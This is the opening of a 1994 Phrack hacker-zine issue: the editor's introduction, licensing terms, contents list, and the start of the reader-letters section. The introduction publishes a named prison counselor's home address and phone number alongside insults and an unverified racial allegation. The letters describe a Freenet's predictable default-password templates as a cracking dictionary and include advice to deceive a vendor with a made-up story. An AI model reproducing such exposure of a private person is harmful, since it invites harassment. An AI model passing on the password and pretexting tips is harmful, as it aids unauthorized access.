==Phrack Magazine==

Volume Five, Issue Forty-Six, File 1 of 28

Issue 46 Index
___________________

P H R A C K 4 6

September 20, 1994
___________________

"La cotorra que chi, no canta"

Honey, I'm home!

Anyway, like the little proverb above indicates, I've been a very busy man since the last issue. I've been denied entry to a federal prison in North Carolina (imagine the irony of THAT); I've been whoring in the Red-Light District of Amsterdam with military intelligence officers from England, Spain and the US; estuve chicaito en Nuevo Lardeo; I've tested wireless networks in Canada; and I've been on TV a few more times. (No, nimrod, Phrack is not my job...I WORK for a living.)

Needless to say, it has been a chore for me to get Phrack out at all, much less only a month or so past my self-imposed quarterly deadline. But hell, I love doing this magazine, so here it is. Phrack is the only way I can completely thrill and simultaneously piss off so many people at once, so I don't think I'll stop any time soon.

Pissing people off. It's what I like to do, and it would appear that I'm quite good at it. I realize that there are several extremely vocal erikb-bashers out there. And to them I say, "smooches!" Let's face it, sour grapes make bad whiners. But hey, "As long as they're talking about Erikb, let 'em talk." (Sorry Mr. Ford)

Besides piecing together this issue, I've been working on getting the WWW pages together. They still aren't 100%, but they are getting there. By the time I finally get them together, the Phrack Web Site should be the ultimate underground resource on the net. Check it out: http://freeside.com/phrack.html

You may be interested in the federal prison remark from the first paragraph. I had a meeting at IBM out in Research Triangle Park. I figured that this would be an ideal time to go see Co/Dec who still has several years of federal time left to serve.
Co/Dec is in the Federal Correctional Institute at Butner, North Carolina, a short 30 or so minutes from where I was staying in RTP. Anyway, I received the necessary forms from Co/Dec to get on the approved visitors list, and sent them back in. After several weeks, Co/Dec said that I still had not been added. My trip was slated for a week away, so I called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got my forms. I then fed-ex'ed a copy (that I luckily had kept). It arrived on Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me that it would be no problem to get me added to Co/Dec's list.

When I arrived on Monday, I called the prison to make sure the visit had been cleared. Mr. LeMay would not return my calls. In fact, not only would he not return any of the 5 or so calls I made, but he didn't even bother to enter my name on the visitor list until the Wednesday after I had already left North Carolina. I'm sorry, but this man must be a real prick.

A bit of background on LeMay. First off, according to those on the inside, LeMay dislikes white people. He supposedly keeps a picture of slaves picking cotton on his desk as a constant reminder of the oppression his people were subjected to. But perhaps working in the prison system where you have constant view of the Aryan Brotherhood in action, I'm sure many would begin to feel likewise. (Can't we all just get along?)

Secondly, LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not put someone in the fucking hole for brushing up on the syntax for xcopy! You put them in the hole for inciting a fucking shank war, or for stealing food, or for punching a guard. Later, Co/Dec found himself in solitary confinement AGAIN because he traded some smokes for telephone parts he was going to use to fix a radio. The hole again. Not for weapons and drugs, NO! Much worse: wires and a speaker!
The prison now considers Co/Dec a security risk, and reads all OUTGOING mail he sends. Not just the regular reading of all incoming mail that any inmate would expect. He can't take any classes, he's had several more days added to his sentence for "bad time served," and in addition, all of his phone calls are live monitored and recorded. (A funny note, during one conversation I found that my touchtones would control the equipment they were using to record the call. The equipment they were using was improperly connected and gave off a terrible hum when activated. I kept turning off the recording, and the security officer kept having to turn it back on.)

All of this, due to Counselor Wilbert LeMay. Thanks guy. If someone can so grossly abuse their power to completely remove the dignity of another human being, inmate or otherwise, that person needs to face severe disciplinary action. I'm writing the warden. Directory Assistance says that Wilbert can be reached at:

Wilbert LeMay
701 East E St.
Butner, NC 27509
919-575-6375

Fun fact: Butner is serviced by GTE.

You know, it's pretty odd that as hackers, we probably know a larger number of ex-cons and current inmates than most people.

But anyway, on to Phrack.

This issue is pretty odd in that "The Man" has consented to write a few syllables for us to distribute. Yes, Winn Schwartau submitted his unique perspectives of Defcon and HOPE. It's funny how many people left Defcon this year and ran home to find information on HIRF weapons after hearing Winn speak. (If you've actually built one by now, email me.)

What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs, Conferences, and an incomplete university dialup list. (Putting out an incomplete list really irritates me, but hell, it's taking a LOT longer than I expected to get some 1300 dialups without more help. AHEM!)

Can you dig it? I knew that you could.
-------------------------------------------------------------------------

READ THE FOLLOWING

IMPORTANT REGISTRATION INFORMATION

Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you.

You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis.

Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership.

_______________________________________________________________

Phrack Magazine corporate/institutional/government agreement

Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine.

This magazine may not be distributed by Company to any outside corporation, organization or government agency.
This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws.

This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document.

In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement.

In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company.

This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed.

This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company.

_________________________________________________________________

REGISTRATION INFORMATION REQUEST FORM

We have approximately __________ users.

Enclosed is $________

We desire Phrack Magazine distributed by (Choose one):

Electronic Mail: _________
Hard Copy:       _________
Diskette:        _________ (Include size & computer format)

Name:_______________________________ Dept:____________________

Company:_______________________________________________________

Address:_______________________________________________________

_______________________________________________________________

City/State/Province:___________________________________________

Country/Postal Code:___________________________________________

Telephone:____________________ Fax:__________________________

Send to:

Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701

-----------------------------------------------------------------------------

Enjoy the magazine. It is for and by the hacking community. Period.
              Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
                        3L33t : Ice-9 (for helping me get this done!)
                     Rad Band : Green Day
                         News : Datastream Cowboy
                  Photography : The Man
            Prison Consultant : Co / Dec
               The Young Girl : Jane March
Motor Trend's Car of the Year : The 2600 Van
        Dickhead of the Month : Wilbert LeMay at FCI Butner
                    Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
                                Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
                                The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
            Special Thanks To : Winn Schwartau

Phrack Magazine V. 5, #46, September 20, 1994. ISSN 1068-1035

Contents Copyright (C) 1994 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list.

Phrack Magazine
603 W. 13th #1A-278                (Phrack Mailing Address)
Austin, TX 78701

freeside.com                       (Phrack FTP Site)
/pub/phrack

http://freeside.com/phrack.html    (Phrack WWW Home Page)

phrack@well.sf.ca.us               (Phrack E-mail Address)
or phrackmag on America Online

Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) )

** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **

Phrack goes out plaintext...you certainly can subscribe in plaintext.
-= Phrack 46 =-

Table Of Contents
~~~~~~~~~~~~~~~~~

 1. Introduction by The Editor                                  17 K
 2. Phrack Loopback / Editorial                                 52 K
 3. Line Noise                                                  61 K
 4. Line Noise                                                  56 K
 5. Phrack Prophile on Minor Threat                             12 K
 6. Paid Advertisement                                          62 K
 7. Paid Advertisement (cont)                                   45 K
 8. The Wonderful World of Pagers by Erik Bloodaxe              24 K
 9. Legal Info by Szechuan Death                                13 K
10. A Guide to Porno Boxes by Carl Corey                        13 K
11. Unix Hacking - Tools of the Trade by The Shining            42 K
12. The fingerd Trojan Horse by Hitman Italy                    32 K
13. The Phrack University Dialup List                           12 K
14. A Little About Dialcom by Herd Beast                        29 K
15. VisaNet Operations Part I by Ice Jey                        50 K
16. VisaNet Operations Part II by Ice Jey                       44 K
17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam   25 K
18. Startalk by The Red Skull                                   21 K
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau       45 K
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau      42 K
21. The Groom Lake Desert Rat by PsychoSpy                      44 K
22. HOPE by Erik Bloodaxe                                       51 K
23. Cyber Christ Bites the Big Apple by Winn Schwartau          60 K
24. The ABCs of Better Hotel Staying by Seven Up                12 K
25. AT&T Definity System 75/85 by Erudite                       13 K
26. Keytrap v1.0 Keyboard Key Logger by Dcypher                 35 K
27. International Scenes by Various Sources                     44 K
28. Phrack World News by Datastream Cowboy                      38 K

    Total:                                                     996 K

_______________________________________________________________________________

"Most hackers would have sold out their mother."
Justin Tanner Peterson

"Treason is loved of many but the traitor hated of all."
Robert Greene (1552-1592)

"They smile in your face, but all the while they want to take your place."
The O'Jays

==Phrack Magazine==

Volume Five, Issue Forty-Six, File 2 of 28

****************************************************************************

Phrack Loopback

------------------------------------------------------------------------------

I'd like to write you about my friend's cat. His name is 'Cid. Cid loves reading, in fact he'll read just about anything, from the labels on his cat food tins to the instructions on the "real" use of his Grafix (incense burner :) ). Well one take, 'Cid (or was it me) was indulging in the reason he got his moniker and mentioned that he'd like to receive Phrack. Well i told him he could just subscribe to it and then he went into a real sob story about how he doesn't have net access. So as a favor to 'Cid (who really does exist, and really has tripped out on brain blotters) i'd like to subscribe to Phrack.

[You may want to take note that Phrack can also be printed on paper. Now, that's a lot of blotter. You've got your subscription, now go watch some anime.]

------------------------------------------------------------------------------

I recently got a new job and shortly after beginning working there, they decided to retool and reorganize a bit for better productivity. While we were going through some old boxes and stuff, I came across a little black box with the words "Demon Dialer" molded into the front of it, it even had the (functional!) 20volt power supply. Needless to say I was pretty happy with my find. I asked if I could have it and since no one else there seemed to know what to make of it, mine it was! My only problem now... I've played around with it, and it seems to do a lot more than what I originally thought, but the fact of the matter is.. I really haven't the foggiest idea of how to get it to REALLY work for me. If anyone has any information, or better still, actual documentation for a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.

Also, something rather strange.
The phone cable attached to it had a normal looking 4-wire connector on one end, but the other was split to have RJ jacks, one with the yellow-black combo and one with the red-green. The split ends (sorry :)) were plugged into the WALL and PHONE jacks on the demon dialer. The purpose for this perplexes me since one's supposed to be input and one's supposed to be a passthrough for the phone to be plugged into. Anyway, any info would be nice. Thanks guys.

[Telephonics was one of those odd telco device manufacturers back in the 80's. They made the demon dialer (a speed dialing device), a two-line conference box, a divertor, etc. Essentially, they provided in hardware what the telco's were beginning to roll-out in software.

I think the line splitter you have was merely plugged into those two jacks for storage purposes. What that probably was for was to allow two lines to use the Demon Dialer. It was probably just reversed when your company boxed it so it wouldn't get lost.

I'm not sure if Telephonics is still in business. A good place to start looking for info would be comp.dcom.telecom or alt.dcom.telecom. Another good place may be Hello Direct (800-HI-HELLO). They used to have Telephonics equipment available for mail-order.]

------------------------------------------------------------------------------

I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare. Supposedly it intersperses tales of his exploits with code and examples. I have big doubts, but have you heard anything good/bad about it?

[Your doubts are well founded. I got an advance copy of that book. Let's put it this way: does any book that contains over a dozen pages of "common passwords" sound like ground breaking material?

This book is so like "Out of the Inner Circle" that I almost wanted to believe Knightmare (Dennis Fiery) was really yet another alias for Bill Landreth.
Imagine "Out of the Inner Circle" with about a hundred or more extra pages of adjectives and examples that may have been useful years back.

The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray gave law enforcement a big buffer of the Black Ice Private BBS and helped spark the infamous LOD Hacker Crackdown, certainly didn't have anything to do with this. In fact, the book has a kind of snide tone to it and is so clueless, that leads me to believe it may have been written by a cop or security type person looking to make a quick buck.

As far as source code, well, there is a sample basic program that tries to emulate a university login.

If you want a good book, go buy "Firewalls and Internet Security" by Cheswick and Bellovin.]

------------------------------------------------------------------------------

Hey Chris,

I'm sure you are under a constant avalanche of requests for certain files, so I might as well add to your frustration. I know of a program that supposedly tracks cellular phone frequencies and displays them on a cellmap. However, I don't know the name of the program or (obviously) where to find this little gem. I was wondering if you could possibly enlighten me on a way to acquire a program similar to the one I have described.

I have developed some other methods of tracking locations of cellular calls. However my methods rely on a database and manually mapping cellular phones, this method is strictly low tech. Of course this would be for experimental use only, therefore it would not be used to actually track actual, restricted, radio spectrum signals. I wouldn't want the aether Gestapo pummeling our heads and necks.

[I don't know of anything that plots frequencies on a cellmap. How would you know the actual locations of cells for whatever city you may be in to plot them accurately?

There are a number of programs written to listen to forward channel messages and tell you when a call is going to jump to another channel.
The cellular telephone experimenter's kit from Network Wizards has a lot of nice C source that will let you write your own programs that work with their interface to the OKI 900.

I suppose you could get the FCC database CD-ROM for your state and make note of longitude and latitude of cell sites and make your own database for your city, and then make a truly visual representation of a cellmap and watch calls move from cell to cell. But I don't think there is such a thing floating around the underground at present.

Of course the carriers have this ability, and are more than happy to make it available to Law Enforcement (without a warrant mind you). Hi OJ!

email Mark Lottor mw@nw.com for more info about the CTEK.]

------------------------------------------------------------------------------

I saw this in a HoHoCon ad:

Top Ten Nark List

1. Traxxter
2. Scott Chasin
3. Chris Goggans
4. Agent Steal
5. Dale Drew
6. Cliff Stoll
7. [blank]
8. Julio Fernandez
9. Scanman
10. Cori Braun

What did Chris Goggans do? Isn't he Erik Bloodaxe, the publisher of Phrack? I sincerely doubt that the feds would have someone working for them that puts out a publication like Phrack. It would be way too much of an embarrassment for them. I wrote to the editor of Phrack when I read that Agent Steal said that the publisher of Phrack was a Fed - IN PHRACK no less. He said it was a stupid rumor. Is there anything to support this fact? And why is there now some manhunt for Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly their employee? The whole thing is very confusing to me. Please explain. If Goggans isn't Bloodaxe then he's Knight Lightning (this just came to me). Nevertheless, what's the story here?

[First off, I think you take things a little too seriously. If you are on a nark hunt, worry about your associates, not people you obviously don't even know.

Chris Goggans (ME) is most positively Erik Bloodaxe. Thanks for remembering.

Agent Steal was involved with the FBI.
This is a fact. In his case, he even appeared to have some kind of immunity while trying to gather information on other hackers like Mitnik and Poulsen. This immunity is under scrutiny by the Bureau's own Internal Affairs (or so the new rumors go), since Steal was pulling a fast one and committing crimes the Bureau didn't know about to get some quick cash while he set up his friends.

My story is a bit more convoluted. You can sum it up by saying, if you interfere with my businesses, I'll try my best to track you down and turn you in. I guess I am a nark.]

------------------------------------------------------------------------------

I read in the last Phrack (45) that you wanted someone to write a few words on scrambling systems. Give me a rough outline of what you want and I'll see if I can help :-)

Basically I wrote the Black Book (European Scrambling Systems 1,2,3,4,5 and World Satellite TV & Scrambling Methods) and also edit Hack Watch News & Syndicated HackWatch. They all deal with scrambling system hacks as opposed to computer hacking & phreaking. (Things are a bit iffy here as regards phreaking as all calls are logged but the eprom phone cards are easy to hack)

Oh yeah and another claim to fame ;-) if you can call it that, is that I was quoted in an article on satellite piracy in "Wired" August issue.

This Hawkwind character that you had an article from in Phrack43 sounds like a *real* hacker indeed :-> Actually there is an elite in Ireland but it is mainly concerned with satellite hacking and that Hawkwind character is obviously just a JAFA (Irish hacker expression - Just Another Fu**ing Amateur).
Most of the advanced telco stuff is tested in the south of the country as Dublin is not really that important in terms of comms - most of the Atlantic path satellite comms gear and brains are on the south coast :-)

Actually the Hawkwind article really pissed off some people here in Ireland - there were a few questions asked on my own bbs (Special Projects +353-51-50143) about this character. I am not even sure if the character is a real hacker or just a wannabe - there were no responses from any of his addresses.

SP is sort of like the neutral territory for satellite and cable hacking information in Europe though there are a few US callers. With the way things are going with your new DBS DirecTv system in the US, it looks like the European satellite hackers are going to be supplying a lot of information (DirecTv's security overlay was developed by News Datacom - the developers of the totally hacked VideoCrypt system here in Europe).

The telco here uses eprom phone cards. These are extremely easy to hack (well most real hackers in .IE work on breaking satellite scrambling systems that use smart cards) as they are only serial eprom.

Regards

[About the satellite information: YES! Write the biggest, best article the whole fucking hacker world has ever seen about every aspect of satellite tv!! Personally, I'm more interested in that than anything else anyone could possibly write (seeing as how I'm about to buy a dish for both C and Ku).

About Hawkwind's article on hacking in Ireland: If I were to write an article about hacking in America, it would be entirely different than anyone else in America would write. A country is a big place. Just because someone else's hacking experience is different than your own, it's no reason to discredit them. However, if your exposure to the scene in Ireland is so completely different than Hawkwind's, I would LOVE to print it as well.]
------------------------------------------------------------------------------

The Columbus Freenet uses a password generating routine that takes the first and last initial of the user's real name, and inserts it into a randomly chosen template. Some of the templates are:

E(f)www5(l)
(f)22ww5(l)     where f and l are first and last initials
(f)2ww97(l)
(f)2ww95(l)

and so on. There are not too many of these templates, I guess maybe 50. I imagine most people go in and change their password right away, but then again that's what a prudent person would do (so they probably don't).

Columbus 2600 meetings: Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the first 2600 meetings in Columbus, unfortunately hardly anyone shows up... I don't know why HP is so dead in Central Ohio, but fear and paranoia run rampant.

That's all for now...keep up with the good work!

R.U.Serius?!

[Hmmm...templates are always a bad thing. All one has to do is get the program that generates them, and voila, you've got a pre-made dict file for your crack program. Not very smart on the part of the Freenet, but hacking a Freenet, is like kicking a puppy.

I hope more people go to your 2600 meetings. The ones here in Austin kinda died out too. Maybe our cities are just lame.]

------------------------------------------------------------------------------

A complaint: That piece about McDonald's in Phrack 45 was, in a word, LAME. Surely Phrack can do better. Maliciousness for its own sake isn't very interesting and frankly the article didn't have any ideas that a bored 13-year-old couldn't have thought up--probably written by one.

That aside, I found some good stuff in there. Some of it was old news, but Phrack serves an archival purpose too, so that was ok.
On a more personal note, I could really relate to your account of HoHoCon--not that I was there, just that I have started to feel old lately even though I don't turn 25 for another 2 days :) Sometimes I feel myself saying things like "Why, sonny, when I was your age the Apple II was king..."

Keep up the good work, and don't let the lamers get you down.

[Thanks for the letter. I personally thought the McDonald's file was a laugh riot. Even if it was juvenile and moronic, I wouldn't expect anyone to analyze it and go through with anything it contained. It was just for fun. Lighten up :)

I am glad to see that at least someone else recognizes that Phrack is attempting to serve as an archive of our subculture, rather than just a collection of technical info that will be outdated overnight, or a buglist that will be rendered mostly unusable within hours of release. There is so much going on within the community, and it is becoming such a spectacle in the popular media, that in 20 years, we can all go back and look at Phrack and remember the people, places, and meetings that changed the face of the net.

Or maybe I'm just terribly lame, and either 1) refuse to put in the good stuff, 2) don't have access to the good stuff, 3) exist only as a puppet agent of The Man, or 4) Don't know nothin' 'bout Telco! But you know what they say about opinions.]

----------------------------------------------------------------------------

I have a few comments on your editorial in Phrack 44 (on information wants to be free). Thanks for voicing an opinion that is shared by many of us. I am glad to see a public figure in the CuG with nutz enuff to actually come out and make such a statement and mean it. Again, thanks.

Now on the subject of hacking as a whole. Is it just me, or are the number of losers on the increase?
There have always been those who would try and apply these skills to ripoff scams and system trashing but now that seems to be the sole intent of many of the "hackers" I come into contact with. What ever happened to hacking to learn more about the system? To really hack a system (be it phone, computer), is a test of skill and determination, and upon success you walk away with a greater understanding of the machine and its software. Hacking is more than just knowing how to run crack on a filched password file, or using some exploitation scripts picked up on IRC, it is a quest for knowledge and gaining superiority over a system by use of great skill acquired by a deliberate effort. Once was a time when things like toll fraud (I do miss blue boxes) were a means to an end, now they seem to be the end in itself.

Also, I am researching info on OSI comsec procedures and have found some really interesting goodies, if you are interested in publishing my piece when completed, let me know..

[(NOTE: This came from a .mil)

Man, I'm glad to see that people in the armed forces still have minds of their own. Not many people would express such a thing openly.

Yes, the destructive/profit-motivated trends of many of the hackers of today are pretty sad. But you have to realize, as the technology becomes more and more like consumer electronics, rather than the traditional mold of computer as scientific research tool, an entirely different market segment will be exposed to it and use the technology for less than scrupulous means.

Even the act of hacking itself. Today, I can basically gain access to any model of system known to man by asking. I realize that there are many who cannot accomplish such a thing, but with the proliferation of public access sites, almost everyone can afford access to the net to explore and learn.
The point comes down to this: if you have an account on a Sun, why do you need an account on a Sun at Boeing, unless you either 1) want to sell the cad files of the 777 to Airbus or McDonnell-Douglas, 2) want to get financial information to make a killing on Wall Street, or 3) just want to have an ego boost and say "I OWN BOEING!"

Personally, I can understand the ego boost aspect, but I've decided that I'd much rather get paid by a company like Boeing to hack for them than against them. I don't want to sell anyone's info, so hacking into any company is basically useless to me, unless they are paying me to look for potential weaknesses. Granted, it's not an easy market to get into, but it's a goal to shoot for.

And for those who find it impossible to quit due to fear of losing their edge, check out my editorial in this issue for a possible solution.]

------------------------------------------------------------------------------

I am looking for a Macintosh app that does the same thing as an app called "Demon Dial" that has been lost in the annals of software history due to the fact that some people (sysops) question whether it is illegal software (it dials up a series of phone #'s looking for data connections). Do you know where I could find an application for the Mac that does this simple function?

[We had a guy ask in an earlier issue for Macintosh hacking/phreaking apps. No one responded. Hell, I know SOMEONE has to use a Mac out there. Are you Mac-weenies all embarrassed to speak up? Hell, uuencode and email me your apps, and I'll put them up for ftp! Help out your poor fellow Macintosh users. I certainly would if I could, but the thought of touching a Mac gives me the chills.]

------------------------------------------------------------------------------

Have you ever heard of being denied access to your own cell phone?
I am currently in the process of buying a cell phone and was informed that I COULD NOT have the programming guide of the security code they enter to program my phone. In my opinion the key word is "MY." If I get a digital security system for my house you better damn well figure I will have the security codes for that. The phone was a Motorola flip phone. I called Motorola and explained how displeased I was with this company and they said they could not interfere with a rep's policy. When I was selling car phones we kept the programming guide unless they asked for it. I demanded it and they laughed in my face. Who said "the customer is always right" anyway?

Thanks, any info is greatly appreciated. By the way, you wouldn't happen to have the CN/A number for 815 would you? Also, any ANAC would be very helpful.

[Well, I hate to say it, but you got typical service from your cellular agent. Let's face it, these sales reps probably knew about as much about that programming manual as I do nuclear physics: "It's confusing, but if you understand it, you can fuck things up."

I am surprised that Motorola wouldn't sell you the book though. Motorola will sell anybody anything. You probably called the wrong place. Moto is so huge they've got multiple groups working on somewhat similar technologies with absolutely no communication between the groups. Sometimes they are in different countries, but sometimes they are in the same city! I would suggest you call a local FAE (Field Applications Engineer) and get them to get the book for you. Make up some story about working on some computer controlled application with the phone, and that you need any and all documentation on the phone. They'll do it. Money is money.

As far as the 815 CNA, hell, just call the business office. I haven't called a CNA in years, only the business office. They are nice people. And no PINs.

815 ANAC: ok guys, someone must have one...email it!

"The customer is always right" wasn't in Bartlett's or Columbia's books of famous quotations. I guess that phrase has been written out of our history. So, from now on you aren't always right, I guess.]

------------------------------------------------------------------------------

Dear Phrack:

We want you!

We want you to be a part of our cutting edge documentary that is traversing across the "NEW EDGE" of computers, culture, and chaos.

Working in conjunction with Douglas Rushkoff, the best selling author of "CYBERIA," we are currently gathering together the leaders of this technological and cultural revolution.

This is not a documentary in the traditional sense of the word. It is more of an exploration, a journey, a unique vision of the world as seen through the eyes of those who live on the bleeding edge; where technology, art, science, music, pleasure, and new thoughts collide. A place people like you and me like to call home.

"New Edge" will deliver a slice of creativity, insanity, and infallibility, and feed those who are hungry for more than what Main Street USA has to offer. This project will detonate across the US and around the world. It will become the who's who of the new frontier and you belong on its illustrious list of futurians.

Please look over the enclosed press release description of the project.

Phrack has long been the ultimate source for hack/phreak info, and helped to push the limits of free speech and information. The role that Phrack has played in the Steve Jackson Games Case set an important precedent for CyberLaw. We will also be interviewing several people from the EFF.

Please call me ASAP to schedule an interview for "New Edge", or send me E-Mail.
Sincerely,

Todd LeValley
Producer, N E W   E D G E
(310) 545-8138 Tel/Fax
belief@eworld.com

W E L C O M E   T O   T H E   W O R L D   O N   T H E   E D G E   O F   T H E   F U T U R E

W E L C O M E   T O   T H E   N E W   E D G E

-the documentary-

T h e   O r g a n i z a t i o n

Belief Productions in association with Film Forum.

T h e   M i s s i o n

Journey through the labyrinth of cyberia and experience the people, places and philosophy that construct cyberspace and the shores of the technological frontier. This fast paced visual voyage through the digital revolution will feature interviews with the innovators, artists, cyberpunks, and visionaries from all sides of the planet. These specialists are the futurists who are engineering our cybergenic tomorrow in laboratories today. Along the way we will investigate the numerous social and political issues which are cropping up as each foot of fiber optic cable is laid. Artificial intelligence, the Internet, nanotechnology, interactive media, computer viruses, electronic music, and virtual reality are just a few of the many nodes our journey will explore.

T h e   F u n d i n g

This exploration is sponsored in part by a grant from The Annenberg Foundation in association with the LA based non-profit cutting-edge media group Film Forum.

T h e   P r o c e s s

The New Edge project will capture moving images with a variety of input devices and then assemble them into one fluid documentary using Apple Macintosh Quadras & PowerMac computers. The post production work will be done entirely on the computers using the Radius Video Vision Telecast Board in conjunction with Quicktime software applications such as Adobe Premiere 4.0 and CoSA After Effects 2.01. The final piece will be recorded to BETACAM SP videotape for exhibition and distribution. The capture formats for the project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film, 35MM Stills, and the Fisher Price Pixelvision 2000.
T h e   R e s u l t s

New Edge will pride itself on an innovative visual and aural style which before today, could only be created on high-end professional video systems and only for short format spots. The New Edge documentary will be two hours in length and will have a dense, layered look previously featured only in much shorter pieces. New Edge will be a showcase piece not only for the content contained within, but for the way in which the piece was produced. It will be a spectacular tribute to the products and technology involved in its creation.

D i s t r i b u t i o n

Direct Cinema - Distributes videos to Libraries, Schools, and Universities throughout the United States.

Mico Entertainment/NHK Enterprises - Provider of American programming for Japanese Television.

Labyrinth Media Ltd. - European reality-based documentary distributor

T h e   A u d i e n c e

New Edge is aimed at both the technophiles and technophobes alike. While the show will feature very complex and sophisticated topics, the discussions will be structured to appeal to both those who do and do not have the technical framework that underlines the cyberian movement. The show's content and style will make it readily available to the MTV and Generation X demographic groups as well as executives who want to stay on top of the latest technological advances. Individuals who read Mondo 2000 and Wired magazine will also naturally latch on to this electronic presentation of their favorite topics.

T h e   G u i d e s

Mike Goedecke - Director/Graphic Designer

Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion Laser Disc Division his work is featured on titles such as: Akira, DEVO-The Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus. Most recently he collaborated with Los Angeles Video Artist Art Nomura on a video installation piece entitled Digital Mandala.
The piece was edited, composited, and mastered to Laser Disc using an Apple Macintosh Computer and off-the-shelf software. The installation is scheduled to tour museums and art galleries across the United States and Europe. While attending Cinema/Television Graduate School at the University of Southern California, Mike directed the award winning documentary short Rhythm, which celebrates various musical cultures.

Todd LeValley - Producer/Graphic Designer

Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a documentary that introduces the electronic underground. This project has been warmly received at numerous "Cyber Festivals" around the country, as well as at the Director's Guild Of America, and is currently being distributed by FringeWare Inc. Todd's commercial experience includes being the in-house graphic designer for Barbour/Langley Productions designing, compositing, and producing the graphic packages for several 20th Century Fox Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel. Todd is a graduate of the Cinema/Television program at Loyola Marymount University.

Jeff Runyan - Cinematographer/Editor

Jeff received an MFA from the University of Southern California's Graduate School of Cinema/Television with an emphasis in cinematography and editing. He studied cinematography under the guidance of Woody Omens, ASC. and Earl Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on the award winning documentary Rhythm. He has recently completed shooting and editing a documentary on Academy Award winning Cinematographer Conrad Hall for the ASC and has just finished directing a short film for USC Teleproductions.

Douglas Rushkoff - Cyber Consultant/Author

Douglas is the author of the best selling Harper Collins San Francisco novel, Cyberia. He spent two years of his life living among the key players in the cyber universe.
Douglas knows the New Edge well and is providing us with the map to its points of interest, rest stops and travelers.

For more information, please contact:

Todd LeValley, Producer
Belief Productions
(310) 545-8138
belief@eworld.com

[Dear New Edge:

You have got to be kidding me.

"Readers of Wired and Mondo 2000 will naturally latch on to this electronic presentation of their favorite topics?"

